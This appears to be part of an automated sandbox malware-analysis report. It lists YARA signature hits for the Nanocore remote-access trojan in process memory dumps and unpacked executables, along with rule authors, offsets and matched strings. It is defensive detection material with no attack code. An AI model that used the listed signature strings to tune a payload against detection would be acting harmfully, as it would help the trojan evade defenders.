0000000D.00000002.538189526.00000000055D0000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000014.00000002.378626193.000000000310B000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4651d:$x1: NanoCore.ClientPluginHost 0x4655a:$x2: IClientNetworkHost 0x4a08d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000014.00000002.378626193.000000000310B000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x46285:$a: NanoCore 0x46295:$a: NanoCore 0x464c9:$a: NanoCore 0x464dd:$a: NanoCore 0x4651d:$a: NanoCore 0x462e4:$b: ClientPlugin 0x464e6:$b: ClientPlugin 0x46526:$b: ClientPlugin 0x4640b:$c: ProjectData 0x46e12:$d: DESCrypto 0x489c7:$i: get_Connected 0x47148:$j: #=q 0x47178:$j: #=q 0x47194:$j: #=q 0x471c4:$j: #=q 0x471e0:$j: #=q 0x471fc:$j: #=q 0x4722c:$j: #=q 0x47248:$j: #=q 0x4728c:$j: #=q 0x472a8:$j: #=q
00000018.00000002.395603538.0000000003171000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000018.00000002.395603538.0000000003171000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x694bf:$a: NanoCore 0x69518:$a: NanoCore 0x69555:$a: NanoCore 0x695ce:$a: NanoCore 0x69521:$b: ClientPlugin 0x6955e:$b: ClientPlugin 0x69e5c:$b: ClientPlugin 0x69e69:$b: ClientPlugin 0x5f645:$e: KeepAlive 0x699a9:$g: LogClientMessage 0x69929:$i: get_Connected 0x598f5:$j: #=q 0x59925:$j: #=q 0x59961:$j: #=q 0x59989:$j: #=q 0x599b9:$j: #=q 0x599e9:$j: #=q 0x59a19:$j: #=q 0x59a49:$j: #=q 0x59a65:$j: #=q 0x59a95:$j: #=q
00000016.00000002.397927395.0000000002B4F000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x71cc1:$x1: NanoCore.ClientPluginHost 0x71cfe:$x2: IClientNetworkHost 0x75831:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000016.00000002.397927395.0000000002B4F000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x71a29:$a: NanoCore 0x71a39:$a: NanoCore 0x71c6d:$a: NanoCore 0x71c81:$a: NanoCore 0x71cc1:$a: NanoCore 0x71a88:$b: ClientPlugin 0x71c8a:$b: ClientPlugin 0x71cca:$b: ClientPlugin 0x71baf:$c: ProjectData 0x725b6:$d: DESCrypto 0x7416b:$i: get_Connected 0x728ec:$j: #=q 0x7291c:$j: #=q 0x72938:$j: #=q 0x72968:$j: #=q 0x72984:$j: #=q 0x729a0:$j: #=q 0x729d0:$j: #=q 0x729ec:$j: #=q 0x72a30:$j: #=q 0x72a4c:$j: #=q
0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x37cdd:$x1: NanoCore.ClientPluginHost 0x5fcfd:$x1: NanoCore.ClientPluginHost 0x37d1a:$x2: IClientNetworkHost 0x5fd3a:$x2: IClientNetworkHost 0x3b84d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6386d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x37a45:$a: NanoCore 0x37a55:$a: NanoCore 0x37c89:$a: NanoCore 0x37c9d:$a: NanoCore 0x37cdd:$a: NanoCore 0x5fa65:$a: NanoCore 0x5fa75:$a: NanoCore 0x5fca9:$a: NanoCore 0x5fcbd:$a: NanoCore 0x5fcfd:$a: NanoCore 0x37aa4:$b: ClientPlugin 0x37ca6:$b: ClientPlugin 0x37ce6:$b: ClientPlugin 0x5fac4:$b: ClientPlugin 0x5fcc6:$b: ClientPlugin 0x5fd06:$b: ClientPlugin 0x37bcb:$c: ProjectData 0x5fbeb:$c: ProjectData 0x385d2:$d: DESCrypto 0x605f2:$d: DESCrypto 0x3ff9e:$e: KeepAlive
0000001A.00000002.419911932.0000000003329000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001A.00000002.419911932.0000000003329000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4356d:$a: NanoCore 0x435c6:$a: NanoCore 0x43603:$a: NanoCore 0x4367c:$a: NanoCore 0x56d27:$a: NanoCore 0x56d3c:$a: NanoCore 0x56d71:$a: NanoCore 0x6fd3b:$a: NanoCore 0x6fd50:$a: NanoCore 0x6fd85:$a: NanoCore 0x435cf:$b: ClientPlugin 0x4360c:$b: ClientPlugin 0x43f0a:$b: ClientPlugin 0x43f17:$b: ClientPlugin 0x56ae3:$b: ClientPlugin 0x56afe:$b: ClientPlugin 0x56b2e:$b: ClientPlugin 0x56d45:$b: ClientPlugin 0x56d7a:$b: ClientPlugin 0x6faf7:$b: ClientPlugin 0x6fb12:$b: ClientPlugin
Process Memory Space: LFEs2N6DU4.exe PID: 2752	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13222:$x1: NanoCore.ClientPluginHost 0x1325f:$x2: IClientNetworkHost 0x16a81:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x21a81:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x30bd7:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x48bbc:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x53e93:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x60810:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: LFEs2N6DU4.exe PID: 2752	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: LFEs2N6DU4.exe PID: 2752	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x12f08:$a: NanoCore 0x12f18:$a: NanoCore 0x12fc7:$a: NanoCore 0x12fd6:$a: NanoCore 0x131ce:$a: NanoCore 0x131e2:$a: NanoCore 0x13222:$a: NanoCore 0x1e0eb:$a: NanoCore 0x1e0fd:$a: NanoCore 0x1e139:$a: NanoCore 0x2d241:$a: NanoCore 0x2d253:$a: NanoCore 0x2d28f:$a: NanoCore 0x45226:$a: NanoCore 0x45238:$a: NanoCore 0x45274:$a: NanoCore 0x504fd:$a: NanoCore 0x5050f:$a: NanoCore 0x5054b:$a: NanoCore 0x5ce7a:$a: NanoCore 0x5ce8c:$a: NanoCore
Process Memory Space: LFEs2N6DU4.exe PID: 3784	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1c7b0:$x1: NanoCore.ClientPluginHost 0x1c7ca:$x2: IClientNetworkHost 0x49e77:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x54981:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: LFEs2N6DU4.exe PID: 3784	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: LFEs2N6DU4.exe PID: 3784	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1c71a:$a: NanoCore 0x1c773:$a: NanoCore 0x1c7b0:$a: NanoCore 0x1c829:$a: NanoCore 0x1cea5:$a: NanoCore 0x1cef8:$a: NanoCore 0x1cf31:$a: NanoCore 0x1cfa4:$a: NanoCore 0x243bd:$a: NanoCore 0x243d0:$a: NanoCore 0x24402:$a: NanoCore 0x2a0b2:$a: NanoCore 0x2a0c5:$a: NanoCore 0x2a0f7:$a: NanoCore 0x3052a:$a: NanoCore 0x30585:$a: NanoCore 0x305f8:$a: NanoCore 0x46a01:$a: NanoCore 0x46a11:$a: NanoCore 0x46a57:$a: NanoCore 0x46a66:$a: NanoCore
Process Memory Space: LFEs2N6DU4.exe PID: 2860	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x12e73:$x1: NanoCore.ClientPluginHost 0x12eb0:$x2: IClientNetworkHost 0x166d4:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x216cd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2caef:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x45309:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x53727:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x60995:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: LFEs2N6DU4.exe PID: 2860	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: LFEs2N6DU4.exe PID: 2860	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x12b59:$a: NanoCore 0x12b69:$a: NanoCore 0x12c18:$a: NanoCore 0x12c27:$a: NanoCore 0x12e1f:$a: NanoCore 0x12e33:$a: NanoCore 0x12e73:$a: NanoCore 0x1dd37:$a: NanoCore 0x1dd49:$a: NanoCore 0x1dd85:$a: NanoCore 0x29159:$a: NanoCore 0x2916b:$a: NanoCore 0x291a7:$a: NanoCore 0x41973:$a: NanoCore 0x41985:$a: NanoCore 0x419c1:$a: NanoCore 0x4fd91:$a: NanoCore 0x4fda3:$a: NanoCore 0x4fddf:$a: NanoCore 0x5cfff:$a: NanoCore 0x5d011:$a: NanoCore
Process Memory Space: dhcpmon.exe PID: 6188	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4e01:$x1: NanoCore.ClientPluginHost 0x4e3e:$x2: IClientNetworkHost 0x8684:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1368c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x228b2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2fbfc:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x52b32:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5de09:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: dhcpmon.exe PID: 6188	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: dhcpmon.exe PID: 6188	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4ae7:$a: NanoCore 0x4af7:$a: NanoCore 0x4ba6:$a: NanoCore 0x4bb5:$a: NanoCore 0x4dad:$a: NanoCore 0x4dc1:$a: NanoCore 0x4e01:$a: NanoCore 0xfcf6:$a: NanoCore 0xfd08:$a: NanoCore 0xfd44:$a: NanoCore 0x1ef1c:$a: NanoCore 0x1ef2e:$a: NanoCore 0x1ef6a:$a: NanoCore 0x2c266:$a: NanoCore 0x2c278:$a: NanoCore 0x2c2b4:$a: NanoCore 0x4f19c:$a: NanoCore 0x4f1ae:$a: NanoCore 0x4f1ea:$a: NanoCore 0x5a473:$a: NanoCore 0x5a485:$a: NanoCore
Process Memory Space: dhcpmon.exe PID: 6304	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x367f:$x1: NanoCore.ClientPluginHost 0x36bc:$x2: IClientNetworkHost 0x6f02:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x11f0a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1d343:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2bfb1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3a41c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6d97e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: dhcpmon.exe PID: 6304	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: dhcpmon.exe PID: 6304	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x335c:$a: NanoCore 0x336c:$a: NanoCore 0x341b:$a: NanoCore 0x342a:$a: NanoCore 0x362b:$a: NanoCore 0x363f:$a: NanoCore 0x367f:$a: NanoCore 0xe574:$a: NanoCore 0xe586:$a: NanoCore 0xe5c2:$a: NanoCore 0x199ad:$a: NanoCore 0x199bf:$a: NanoCore 0x199fb:$a: NanoCore 0x2861b:$a: NanoCore 0x2862d:$a: NanoCore 0x28669:$a: NanoCore 0x36a86:$a: NanoCore 0x36a98:$a: NanoCore 0x36ad4:$a: NanoCore 0x69fe8:$a: NanoCore 0x69ffa:$a: NanoCore
Process Memory Space: LFEs2N6DU4.exe PID: 6504	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1171:$x1: NanoCore.ClientPluginHost 0x118b:$x2: IClientNetworkHost 0x2636c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x30e76:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: LFEs2N6DU4.exe PID: 6504	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: LFEs2N6DU4.exe PID: 6504	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10db:$a: NanoCore 0x1134:$a: NanoCore 0x1171:$a: NanoCore 0x11ea:$a: NanoCore 0x1866:$a: NanoCore 0x18b9:$a: NanoCore 0x18f2:$a: NanoCore 0x1965:$a: NanoCore 0x8db0:$a: NanoCore 0x8dc3:$a: NanoCore 0x8df5:$a: NanoCore 0xeabe:$a: NanoCore 0xead1:$a: NanoCore 0xeb03:$a: NanoCore 0x22edd:$a: NanoCore 0x22eed:$a: NanoCore 0x22f29:$a: NanoCore 0x22f38:$a: NanoCore 0x2d4e0:$a: NanoCore 0x2d4f2:$a: NanoCore 0x2d52e:$a: NanoCore
Process Memory Space: dhcpmon.exe PID: 6648	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x20538:$x1: NanoCore.ClientPluginHost 0x20552:$x2: IClientNetworkHost 0x34e28:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3f932:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: dhcpmon.exe PID: 6648	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: dhcpmon.exe PID: 6648	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xb1ce:$a: NanoCore 0xb229:$a: NanoCore 0xb29d:$a: NanoCore 0x204a2:$a: NanoCore 0x204fb:$a: NanoCore 0x20538:$a: NanoCore 0x205b1:$a: NanoCore 0x20b1b:$a: NanoCore 0x20b6e:$a: NanoCore 0x20ba7:$a: NanoCore 0x20c1a:$a: NanoCore 0x21728:$a: NanoCore 0x26962:$a: NanoCore 0x26975:$a: NanoCore 0x269a7:$a: NanoCore 0x2bde7:$a: NanoCore 0x2bdfa:$a: NanoCore 0x2be2c:$a: NanoCore 0x319b0:$a: NanoCore 0x319f6:$a: NanoCore 0x31a05:$a: NanoCore
Process Memory Space: dhcpmon.exe PID: 6732	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2a4e8:$x1: NanoCore.ClientPluginHost 0x2a502:$x2: IClientNetworkHost 0x35c55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4077b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: dhcpmon.exe PID: 6732	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: dhcpmon.exe PID: 6732	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x111e0:$a: NanoCore 0x111f8:$a: NanoCore 0x11acf:$a: NanoCore 0x1534a:$a: NanoCore 0x153a5:$a: NanoCore 0x15419:$a: NanoCore 0x2a452:$a: NanoCore 0x2a4ab:$a: NanoCore 0x2a4e8:$a: NanoCore 0x2a561:$a: NanoCore 0x2aacb:$a: NanoCore 0x2ab1e:$a: NanoCore 0x2ab57:$a: NanoCore 0x2abca:$a: NanoCore 0x2ddf4:$a: NanoCore 0x32521:$a: NanoCore 0x32530:$a: NanoCore 0x3cde5:$a: NanoCore 0x3cdf7:$a: NanoCore 0x3ce33:$a: NanoCore 0x4f70e:$a: NanoCore
Click to see the 83 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
25.2.dhcpmon.exe.3c005c4.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287c1:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287ee:$x2: IClientNetworkHost
25.2.dhcpmon.exe.3c005c4.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287c1:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2989c:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287db:$s5: IClientLoggingHost
25.2.dhcpmon.exe.3c005c4.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
25.2.dhcpmon.exe.3c005c4.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
25.2.dhcpmon.exe.3c005c4.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
25.2.dhcpmon.exe.3c005c4.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
26.2.dhcpmon.exe.3374bed.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24198:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241c5:$x2: IClientNetworkHost
26.2.dhcpmon.exe.3374bed.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24198:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x25273:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x241b2:$s5: IClientLoggingHost
26.2.dhcpmon.exe.3374bed.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
21.2.dhcpmon.exe.38a9b90.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
21.2.dhcpmon.exe.38a9b90.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
21.2.dhcpmon.exe.38a9b90.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
21.2.dhcpmon.exe.38a9b90.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
13.2.LFEs2N6DU4.exe.5650000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
13.2.LFEs2N6DU4.exe.5650000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
13.2.LFEs2N6DU4.exe.5650000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.LFEs2N6DU4.exe.24b0e9c.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.LFEs2N6DU4.exe.24b0e9c.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0xe3b7:$s5: IClientLoggingHost
1.2.LFEs2N6DU4.exe.24b0e9c.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q 0xf0fc:$j: #=q 0xf118:$j: #=q
1.2.LFEs2N6DU4.exe.24b0e9c.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.LFEs2N6DU4.exe.24b0e9c.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x101b7:$s5: IClientLoggingHost
1.2.LFEs2N6DU4.exe.24b0e9c.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q 0x10efc:$j: #=q 0x10f18:$j: #=q
22.2.dhcpmon.exe.2bb0b34.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.dhcpmon.exe.2bb0b34.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0xe3b7:$s5: IClientLoggingHost
22.2.dhcpmon.exe.2bb0b34.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q 0xf0fc:$j: #=q 0xf118:$j: #=q
22.2.dhcpmon.exe.3c59b90.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.dhcpmon.exe.3c59b90.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
